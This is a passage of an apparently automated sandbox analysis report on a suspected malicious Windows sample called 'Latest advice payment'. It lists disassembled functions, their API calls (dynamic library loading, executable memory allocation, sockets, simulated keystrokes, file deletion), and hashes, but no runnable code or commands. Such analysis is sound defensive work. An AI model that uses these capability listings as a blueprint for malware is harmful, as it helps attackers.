                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: 2cee44d266c59f57209944af78bc73c815571c1475cbd8e30fe876a28fb06d53
                                                            • Instruction ID: 19b0c809edc0ab3c6744d46c27349b50c1d759356ae5f3ba4fa5de8fed12e171
                                                            • Opcode Fuzzy Hash: 2cee44d266c59f57209944af78bc73c815571c1475cbd8e30fe876a28fb06d53
                                                            • Instruction Fuzzy Hash: FFD0EC30511712CFD7245B71D948647BAD6AF19351B15883994C6DB250EAB0D880CB50
                                                            Function 00564C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00564B83,?), ref: 00564C44
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00564C56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: 7d2f6c105867d0de6aa5e3e6f44aa49c39f763b4abc972a2d73e2a7c42531a4d
                                                            • Instruction ID: 5243d5d1110c56fd6617feab9766ee72803baa4a2b59cc533125f74d4364709a
                                                            • Opcode Fuzzy Hash: 7d2f6c105867d0de6aa5e3e6f44aa49c39f763b4abc972a2d73e2a7c42531a4d
                                                            • Instruction Fuzzy Hash: 2BD01730910B53CFE72C9F32D94864ABBEABF15351B15C83E94D6DA260EA70D890CB60
                                                            Function 005E0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,005E1039), ref: 005E0DF5
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 005E0E07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: 4a8968b782df3ea2230e053419470555ea07d89181888f17a3f53416584ae8e7
                                                            • Instruction ID: e4aecfa9bac315e1cfba7e5a857edbfea180433cad09928aa93e72191ca7f1ac
                                                            • Opcode Fuzzy Hash: 4a8968b782df3ea2230e053419470555ea07d89181888f17a3f53416584ae8e7
                                                            • Instruction Fuzzy Hash: 8CD0C230400716CFC3284FB1C84828276EAAF10341F05CC3D94C2DA190DAB0D4D0C720
                                                            Function 005D90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,005D8CF4,?,005EF910), ref: 005D90EE
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005D9100
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: b7ae9372908347c780b3c8b5eb17aafffe40fef5990e041acebb385bb5d11b32
                                                            • Instruction ID: 05c6a8d617ce26280e567ecd655c8c217591d9ceb0a734eb82cd4b3ca37f8598
                                                            • Opcode Fuzzy Hash: b7ae9372908347c780b3c8b5eb17aafffe40fef5990e041acebb385bb5d11b32
                                                            • Instruction Fuzzy Hash: ACD01734910713CFDB289F75D8586467AE9BF15391B16C83F94CADA690EA70C8C0CBA0
                                                            Function 005A1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            • Opcode ID: 939d362447cba43eb69e9d334ad143f32a08e9520af7e937194f1f966c0a365e
                                                            • Instruction ID: 228f3dfd6728957bb7aafd8d819372f977a62308e44c0d42704354941a0f25c2
                                                            • Opcode Fuzzy Hash: 939d362447cba43eb69e9d334ad143f32a08e9520af7e937194f1f966c0a365e
                                                            • Instruction Fuzzy Hash: 2DD01775844519FACB049A90DC898FD7F7CFB1A701F142862B946E2040E6219B94EB29
                                                            Function 005B717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c2ef7cd7216d320fb6bf5fd38b5075c3c6e8502ff7e05d33fed8577b2c43b0c
                                                            • Instruction ID: 4718a9d176f2235610a954377c0fca050705220360c546f5a1403739906104fe
                                                            • Opcode Fuzzy Hash: 7c2ef7cd7216d320fb6bf5fd38b5075c3c6e8502ff7e05d33fed8577b2c43b0c
                                                            • Instruction Fuzzy Hash: 4AC14175A0421AEFCB14CFA4C884EAEBBF5FF88714B154998E805EB251D730ED41DB90
                                                            Function 005DE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 005DE0BE
                                                            • CharLowerBuffW.USER32(?,?), ref: 005DE101
                                                              • Part of subcall function 005DD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 005DD7C5
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 005DE301
                                                            • _memmove.LIBCMT ref: 005DE314
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            • Opcode ID: 79651589469337f597945c2ea169fd905721f9fa9170e3aac870a22ce72a95c9
                                                            • Instruction ID: 43b8787efee0d269b3d5a31fcb7b6ae3ae890b518b52397736054b8c82cb86b4
                                                            • Opcode Fuzzy Hash: 79651589469337f597945c2ea169fd905721f9fa9170e3aac870a22ce72a95c9
                                                            • Instruction Fuzzy Hash: 38C15671608302DFC714EF28C485A6ABBE4FF89714F04896EF8999B351D731E946CB82
                                                            Function 005D8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 005D80C3
                                                            • CoUninitialize.OLE32 ref: 005D80CE
                                                              • Part of subcall function 005BD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 005BD5D4
                                                            • VariantInit.OLEAUT32(?), ref: 005D80D9
                                                            • VariantClear.OLEAUT32(?), ref: 005D83AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            • Opcode ID: 6e637291e598c10d6f4ae6401d91dea7c767c98c4a60ef141e665bada350222f
                                                            • Instruction ID: 602fcf0687efa9fd002169e296c70f6c4b0d4a870183624a31eda099c41495e9
                                                            • Opcode Fuzzy Hash: 6e637291e598c10d6f4ae6401d91dea7c767c98c4a60ef141e665bada350222f
                                                            • Instruction Fuzzy Hash: E4A15A75604702DFDB10DF58C885B2ABBE4BF89754F14485AF99A9B3A1CB30ED05CB82
                                                            Function 005B687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: 700c5c3f07752404c3c9aad60911a1d2363a574102a09bd7d745b650def709e9
                                                            • Instruction ID: 823af4b43bb6c540f2651cdcc5b16ad98cf3484e6db44239067c7191dc9b2ab0
                                                            • Opcode Fuzzy Hash: 700c5c3f07752404c3c9aad60911a1d2363a574102a09bd7d745b650def709e9
                                                            • Instruction Fuzzy Hash: 6951C574700302DEDF24AF65D495ABABBE5BF84310F20D81FE586EB291DA78F8448701
                                                            Function 005E97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(01080270,?), ref: 005E9863
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 005E9896
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 005E9903
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: f197774c943331890a13adb6b98e9c3bd5760415d1bec6abdf80a4068ee28b18
                                                            • Instruction ID: df3ec08a9150748baeb9a8dcb834d4202c19f91071734fa4db471999e75d43a5
                                                            • Opcode Fuzzy Hash: f197774c943331890a13adb6b98e9c3bd5760415d1bec6abdf80a4068ee28b18
                                                            • Instruction Fuzzy Hash: 4C515135A00649EFCF28CF15C884AAE7BB6FF55360F148169F895DB2A1D770AD41CB50
                                                            Function 005B9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 005B9AD2
                                                            • __itow.LIBCMT ref: 005B9B03
                                                              • Part of subcall function 005B9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 005B9DBE
                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 005B9B6C
                                                            • __itow.LIBCMT ref: 005B9BC3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • String ID:
                                                            • API String ID: 3379773720-0
                                                            • Opcode ID: dd149074293b8f0055abfbdeb19a6409d7e002970e20373b333520680aac0fb7
                                                            • Instruction ID: 1d5a2b57dcf55ea2a05a8539d0fada26d9c54342958d010bdf5c8175aa98c7af
                                                            • Opcode Fuzzy Hash: dd149074293b8f0055abfbdeb19a6409d7e002970e20373b333520680aac0fb7
                                                            • Instruction Fuzzy Hash: 3A414F74A0420DABDF25EF54D849BFE7FB9FF88714F000059BA05A7291DB70AA44CB61
                                                            Function 005D69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 005D69D1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D69E1
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 005D6A45
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D6A51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            • Opcode ID: f5759641d2238e23b717947f06e6a995d4b0daef1ce0f696a67ae77165c7e460
                                                            • Instruction ID: d91c07668c40a3e645430c5212fc4749ef539d9dc0d5019b6f578c066e932437
                                                            • Opcode Fuzzy Hash: f5759641d2238e23b717947f06e6a995d4b0daef1ce0f696a67ae77165c7e460
                                                            • Instruction Fuzzy Hash: 9C41C374740201AFEB60AF64CC8AF397BE8FB54B14F048519FA599F3C2DA709D018791
                                                            Function 005D641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,005EF910), ref: 005D64A7
                                                            • _strlen.LIBCMT ref: 005D64D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: 680ab5a4fc79767d3610ce70ff7cc347a6fa381c32b75040f430dda4b105ab8e
                                                            • Instruction ID: 3cc3ce0588e537692e9b7d5d8eb2a1c2dc316706b0955947dcca81ed99aa7d6f
                                                            • Opcode Fuzzy Hash: 680ab5a4fc79767d3610ce70ff7cc347a6fa381c32b75040f430dda4b105ab8e
                                                            • Instruction Fuzzy Hash: 4F41C831504106ABCB24EFA8ECD9FAEBFA8BF94310F508156F81597392EB30AD45CB50
                                                            Function 005CB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 005CB89E
                                                            • GetLastError.KERNEL32(?,00000000), ref: 005CB8C4
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 005CB8E9
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 005CB915
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: eb14f6125ac9e33f1746d845634d56fd7afdb994731a698a1ec284b34a487341
                                                            • Instruction ID: 594783c5f3c6d1ecdfd80386907acd08564e952b0cce2b85ec6fe9a15faece6b
                                                            • Opcode Fuzzy Hash: eb14f6125ac9e33f1746d845634d56fd7afdb994731a698a1ec284b34a487341
                                                            • Instruction Fuzzy Hash: A5411739600651DFCB10EF95C489A59BBE5BF8A714F098098ED4AAB362CB30FD01DB91
                                                            Function 005E8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005E88DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: 1b5835963ee01aabbcd615ebe2c81a56bbb6e4263ba9bd9a27ac5be654e2bb1c
                                                            • Instruction ID: ad41639b84078463bb3499e8f003bd5d418aa736aca08cf363fb005f92a107a2
                                                            • Opcode Fuzzy Hash: 1b5835963ee01aabbcd615ebe2c81a56bbb6e4263ba9bd9a27ac5be654e2bb1c
                                                            • Instruction Fuzzy Hash: 4A311434A04588AFEB389F5ADC85BB83FA1FB05310F500812FAD9E61E2CE31D9409B52
                                                            Function 005EAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 005EAB60
                                                            • GetWindowRect.USER32(?,?), ref: 005EABD6
                                                            • PtInRect.USER32(?,?,005EC014), ref: 005EABE6
                                                            • MessageBeep.USER32(00000000), ref: 005EAC57
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 948ba94bc477fb3a438d64b17cb4f3d05436ac035b662788561f5f93b05bb3cb
                                                            • Instruction ID: e18fcd32dbf08fd4ae680517a1bfbc9606002d1adc01765775538580324ade75
                                                            • Opcode Fuzzy Hash: 948ba94bc477fb3a438d64b17cb4f3d05436ac035b662788561f5f93b05bb3cb
                                                            • Instruction Fuzzy Hash: 25417E30600599DFCB29DF69D884A697BF6FB89300F2494A9F499DF260D730BC41DB92
                                                            Function 005C0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 005C0B27
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 005C0B43
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 005C0BA9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 005C0BFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 1642abaed7a0e1aa6ba82c091cdd78f7daf89c8f0f6a42bb0dc8b71d4ebd931a
                                                            • Instruction ID: bc32b855a4967315b1bbdab412fa14e4d005b94c4f30e7f8b91facc79a2cfe75
                                                            • Opcode Fuzzy Hash: 1642abaed7a0e1aa6ba82c091cdd78f7daf89c8f0f6a42bb0dc8b71d4ebd931a
                                                            • Instruction Fuzzy Hash: 94312430940618EEEF34CAA58C09FFEBFA9BB5532CF04925EE481521D1C3B49D4497A1
                                                            Function 005C0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 005C0C66
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 005C0C82
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 005C0CE1
                                                            • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 005C0D33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
